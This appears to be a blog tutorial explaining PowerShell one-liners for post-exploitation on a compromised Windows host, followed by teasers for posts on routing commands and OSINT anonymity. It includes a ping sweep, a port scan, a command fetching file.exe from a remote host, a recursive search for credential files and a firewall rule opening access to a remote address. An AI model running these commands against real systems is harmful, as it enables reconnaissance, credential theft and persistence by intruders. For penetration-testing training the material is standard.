PowerShell for Post-Exploitation Tasks.

-

1. Perform a network ping sweep:

```powershell

PS C:\\> 1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | Select-String ttl}

```

- `1..255`: Generates a sequence of numbers from 1 to 255. These represent the last octet of the target IP addresses (`192.168.1.1` to `192.168.1.255`).

- `%`: The shorthand for `ForEach-Object` cmdlet, iterating over each number in the range.

- `ping -n 1 -w 100`: Sends one (`-n 1`) ICMP Echo Request packet to the target IP address with a timeout of 100 milliseconds (`-w 100`).

- `Select-String ttl`: Filters the output of the `ping` command to capture responses with a TTL value, indicating that the target host is reachable.

2. Execute a port scan:

```powershell

PS C:\\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.1",$_)) "Port $_ is open!"} 2>$null

```

- `1..1024`: Iterates over the port range from 1 to 1024.

- `new-object Net.Sockets.TcpClient`: Creates an instance of the `TcpClient` class, which is used to attempt a TCP connection to a specific port.

- `.Connect("192.168.1.1", $_)`: Tries to connect to the IP `192.168.1.1` on the port specified by `$_` (the current port in the iteration).

- `"Port $_ is open!"`: If the connection is successful, this message will be displayed.

- `2>$null`: Redirects any error output (e.g., for closed ports) to `$null`, effectively suppressing errors.

3. Download a file via HTTP:

```powershell

PS C:\\> (New-Object System.Net.WebClient).DownloadFile("http://192.168.1.1/file.exe", "file.exe")

```

- `New-Object System.Net.WebClient`: Creates a new instance of the `WebClient` class, which provides methods for downloading data from the web.

- `.DownloadFile`: Downloads a file from the specified URL (`http://192.168.1.1/file.exe`) and saves it as `file.exe` locally.

- `"file.exe"`: The local path where the file will be saved.

4. Search for files by name:

```powershell

PS C:\\> Get-ChildItem "C:\Users\" -recurse -include *credentials*.txt

```

- `Get-ChildItem "C:\Users\"`: Retrieves the file and directory listings within the `C:\Users\` directory.

- `-recurse`: Recursively searches all subdirectories within the specified path.

- `-include *credentials*.txt`: Filters results to only include files whose names contain the string `credentials` and end with `.txt`.

5. List installed updates:

```powershell

PS C:\\> Get-HotFix

```

- `Get-HotFix`: Lists all installed updates and hotfixes on the system. This cmdlet queries the system for records of patches and updates applied via Windows Update or other installation methods.

- It returns information such as the update's ID, description, and the date it was applied.

6. Access Windows registry:

```powershell

PS C:\\> cd HKLM:\

PS HKLM:\> ls

```

- `cd HKLM:\`: Changes the current working directory to the `HKLM` (HKEY_LOCAL_MACHINE) registry hive, which contains system-wide configuration settings.

- `ls`: Lists all keys and values within the current registry path. It retrieves a directory-like structure of registry keys and subkeys.

7. List startup programs from the registry:

```powershell

PS C:\\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run

```

- `Get-ItemProperty`: Retrieves the properties (values) of the specified registry key.

- `HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run`: Specifies the registry path where startup programs are listed. This registry path controls which programs are set to run when Windows starts.

8. Encode a string to Base64:

```powershell

PS C:\\> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("Hello PowerShell!"))

```

- `[System.Text.Encoding]::UTF8.GetBytes("Hello PowerShell!")`: Converts the string `"Hello PowerShell!"` into a byte array using UTF-8 encoding.

- `[System.Convert]::ToBase64String`: Converts the byte array into a Base64-encoded string.

- This is commonly used to encode binary data into a text format for easier transmission or storage, often used in encoding payloads, credentials, or data for web requests.

9. Manage Windows firewall rules:

- List all firewall rules:

```powershell

PS C:\\> Get-NetFirewallRule –all

```

- `Get-NetFirewallRule`: Retrieves the list of all firewall rules, including active, inactive, and default rules.

- `–all`: Includes all rules, even those that are disabled or system-defined.

- Create a new firewall rule:

```powershell

PS C:\\> New-NetFirewallRule -Action Allow -DisplayName AllowAccess -RemoteAddress 192.168.1.25

```

- `New-NetFirewallRule`: Creates a new firewall rule.

- `-Action Allow`: Specifies that the rule will allow traffic (as opposed to blocking).

- `-DisplayName AllowAccess`: Sets the name of the rule to `AllowAccess` for easy identification.

- `-RemoteAddress 192.168.1.25`: Specifies that the rule applies to traffic coming from IP address `192.168.1.25`.


These commands utilize various PowerShell cmdlets and .NET classes to interact with system components such as networking, files, the registry, and the firewall. Each command serves a specific post-exploitation task, whether for information gathering, maintaining persistence, or modifying system configurations.

Comments

Post a Comment

Popular posts from this blog

Common Network Commands: IP R

-
IP R Command Overview The `ip r` command is part of the `iproute2` package in Linux systems. It is used for displaying and manipulating the routing table, which determines how network packets are directed to their destinations. This command is vital for network configuration, management, and troubleshooting. Origin and Development The `iproute2` package was created to replace the older `net-tools` package, which included commands like `ifconfig` and `route`. The `ip` command provides a more unified interface for network management, supporting advanced features and modern networking protocols. It offers better capabilities for managing complex networking scenarios, making it a crucial tool for system and network administrators. Basic Functionality The `ip r` command serves several functions: - Displays current routing table entries. - Shows destination networks, gateways, and associated interfaces. - Allows for the addition, deletion, and modification of routes. Key Command Syntax 1. Di...
Read more

Common Network Commands: Route

-
Route Command Overview The route command is a part of the older net-tools package used in Linux systems for viewing and manipulating the IP routing table. It provides information about how packets are routed through the network and allows for the addition, deletion, and modification of routes. Origin and Development Historically, the route command has been a primary tool for managing network routing in Linux. However, it has largely been replaced by the ip command from the iproute2 package, which offers more advanced features and capabilities. Despite this, route is still commonly used in many Linux distributions for its simplicity and familiarity. Basic Functionality The route command serves several functions: - Displays the current routing table entries. - Shows destination networks, gateways, and associated interfaces. - Allows for the addition, deletion, and modification of routes. Key Command Syntax 1. Display Routing Table:    ```    route -n    ``` ...
Read more

OSINT - Securing Yourself Online - Anonymization.

-
1. Introduction: The Need for Anonymity in OSINT. Open-source intelligence (OSINT) is a powerful tool in digital investigations, allowing researchers to access publicly available information to gather insights into a variety of topics, from cybercrime to political analysis. However, conducting OSINT research comes with a unique set of challenges, primarily related to maintaining anonymity and safeguarding your identity. Researchers often need to protect themselves from retaliation, surveillance, and the ethical responsibility of keeping their investigations discreet. The necessity of using anonymization tools and techniques is especially critical in sensitive areas such as political dissidence, investigations into illicit activities, and surveillance of hostile actors. This guide will explore the best practices for anonymizing OSINT efforts, including using virtual machines, VPNs, Tor, browser extensions, and more. 2. Using Virtual Machines (VMs) for Enhanced Anonymity. Virtual Machine...
Read more